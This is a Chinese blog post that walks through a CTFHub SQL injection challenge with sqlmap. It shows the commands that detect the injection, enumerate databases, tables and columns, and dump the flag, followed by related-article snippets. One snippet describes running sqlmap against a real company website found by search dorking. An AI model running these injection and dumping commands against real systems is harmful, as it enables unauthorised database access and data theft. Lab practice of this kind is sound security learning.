sqlmap使用

最新推荐文章于 2023-09-29 12:54:20 发布
最新推荐文章于 2023-09-29 12:54:20 发布
阅读量6.2k 收藏 2
点赞数
分类专栏: 笔记 文章标签: 测试工具 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46617336/article/details/120615850
版权
本文介绍了开源SQL注入工具SQLMap的使用,包括在CTFHub平台上的应用环境。通过整型溢出判断、注入测试,展示了如何使用SQLMap爆出数据库、表名及列名,并解决取值过程中遇到的问题。利用SQLMap进行自动化渗透测试,能有效提高效率,但理解原理仍需手动实践。
摘要由CSDN通过智能技术生成

渗透测试工具之sqlmap——简单应用

渗透测试工具之sqlmap

工具介绍

一款开源的SQL注入工具,适用于win和kali(本文使用debian)。现在使用最新版sqlmap,通过安装可以实现在Python3的环境里运行。

应用环境

CTFHub平台中的SQL注入相关题目
链接:https://www.ctfhub.com

整型溢出

判断是否存在注入

sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1  --batch


根据扫描结果,判断可能存在:

  1. 盲注
  2. 联合查询

爆出数据库

注意“–” “-”的使用,否则会报错

  1. 爆所有数据库
sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1 -dbs --batch

ALT
2. 爆当前数据库

sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1 --current-db --batch

在这里插入图片描述
得到的数据库“sqli”

爆表名

sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch

在这里插入图片描述
得到 flag 表 与 news表,猜测flag信息在第一个表中

爆列名

sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch

在这里插入图片描述
列名:flag

取值

其他文章的方法如下,

sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -D flag --dump --batch

不知道为什么在自己的环境里面会报错
在这里插入图片描述
错误提示:unable to retrieve column names for table ‘flag’ in database ‘flag’
但是,命令按照逻辑似乎没有问题
解决:更改命令顺序如下:

sqlmap -u http://challenge-4dfbb24e6ad5e0fb.sandbox.ctfhub.com:10800/?id=1 --dump -C flag -T flag -D sqli

最后问题解决,得到最终的flag
在这里插入图片描述

总结

之前使用SQL注入,采用手动注入再结合python进行遍历,常常因为网络抖动,获取flag相对比较麻烦。用工具会快一些,但是原理理解还是需要手动注入实践。

毅xiu
关注
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 8017
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
SQLMAP debian安装
qq_31561731的博客
01-01 1232
1.先安装git命令,用来从GitHub上面clone Sqlmap apt-get install git 2、从 github 上克隆 sqlmap 到本地 sqlmap地址:https://github.com/sqlmapproject/sqlmap 通过git 命令我们直接使用以下命令clone下来到自己的debian系统就行了。 git clone git@github.com:sqlmapproject/sqlmap.git /你要放sqlmap的目录路径 现在只需要等待它clone完成
sqli-labs提示和答案(含详细教程)
superprintf的博客
10-02 1685
前四关登录成功显示用户名,报错正常 第一关id=‘1’ 第二关id=1 第三关id=(‘1’) 第四关id=(“1”) 第五关和六关登录成功不显示用户名,报错正常 第五关id=‘1’ 第六关id=“1” 第七关登录成功不显示用户名,报错固定为You have an error in your SQL syntax 第七关id=((‘1’)) 第八关登录成功不显示用户名,不报错 第八关id=‘1’ 第九关登录成功或者失败只显示You are in… ...
【已解决】Unable to resolve column ‘name‘
weixin_43899069的博客
03-03 6567
原因:数据库未导入IDEA,导致项目无法识别变量名。 解决办法: 打开数据库管理界面: 选择自己使用数据库: 解决
sqlmap注入检测经验0x01
weixin_34319374的博客
10-25 322
某日偶遇一SQLInjection Point,MSSQL 2008,已开启显错模式。 马上扔进SQLMap跑,一路顺畅,竟然还是SA的权限,心想运气真好,无论如何都拿定了。 数据库,表,列都列出来了,但是上–dump参数就死活跑不出来。 报错 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2...
Sqlmap使用手册中文版
最新发布
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
BUUCTF web之随便注
内心不种满鲜花就会长满杂草
11-21 2371
启动靶场访问如下,输入1',报错,可知是字符型注入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap注入一下,显示存在注入,但是始终注入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap注入不出来,所以先尝试手注。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合注入。
网站被攻击扫描SQL注入的日常记录
weixin_30339969的博客
04-23 636
我发了个博客,泄露了域名之后,便有人疯狂的尝试攻击我的站点,奈何我防守做得比较好,直接把网段封了,看到403还锲而不舍,我真是想给他颁奖了 查看ua,发现很多sqlmap的ua,肯定会是被刷了,只是运气比较好,没突破防守 日志记录里边出现这条,经过查阅,是注入攻击 %29%3BSELECT%20PG_SLEEP%285%29 原文在这里 https://www.ji...
SQLmap实战记录
积木网络
08-22 1万+
【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url” -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信息 2、数据库的类
记录一次SQL注入src挖掘过程
m0_62584974的博客
09-29 1103
记录挖洞小白的一次SQL注入挖洞经历
sqlmap问题及解决办法
启航之路
05-24 1万+
真好,一个sqlmap注入问题困扰我一周,最后发现命令给错了。 事情是这样子的: 利用sqlmap对DVWA中Low进行SQL注入 输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1 报错:不可注入…提示 后来我根据提示中的命令重新输入了一次,发现还是有问题(单独加cookie也不行) 吐了呀,一直以为环境有问题,sqlmap和python又重装了一遍。 然后用kali虚拟机注入,都一样结
SQL使用工具sqlmap注入】CTFHub之mysql结构
zguohuai的博客
05-10 315
使用sqlmap进行数据注入
SQLmap使用入门
zhugl的博客
03-09 3075
sqlmap是一个强大的开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。当把url交给sqlmap时,若有漏洞sqlmap则会返回数据库版本信息等。 它支持MySQL, Oracle, PostgreSQL, DB2, SQLite等众多数据库 它支持六种SQL注入技术(boolean-based blind, time-based blind, error-bas...
SQL注入之SQLmap入门
Shellcode.Cool!
04-18 907
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/和http://sqlmap.org/ SQLmap的作者是谁
sqlmap 使用指令
09-22
sqlmap 是一款常用的自动化 SQL 注入工具,它可以帮助检测和利用 SQL 注入漏洞。下面是一些常用的 sqlmap 使用指令: 1. 扫描目标网站是否存在 SQL 注入漏洞: `python sqlmap.py -u <URL>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1` 2. 检测目标网站是否存在 SQL 注入漏洞,并获取数据库类型: `python sqlmap.py -u <URL> --dbs` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbs` 3. 指定目标数据库进行注入测试: `python sqlmap.py -u <URL> --dbms <database>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbms mysql` 4. 指定目标注入点进行注入测试: `python sqlmap.py -u <URL> --dbms <database> --level <level> --risk <risk>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbms mysql --level 2 --risk 3` 5. 获取目标数据库的所有表: `python sqlmap.py -u <URL> --dbms <database> -D <database_name> --tables` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1 --dbms mysql -D database_name --tables` 这只是 sqlmap 的一些基本指令,实际使用中还有更多高级功能和选项可供选择。在使用 sqlmap 时,你需要确保已经获得了授权来测试目标网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值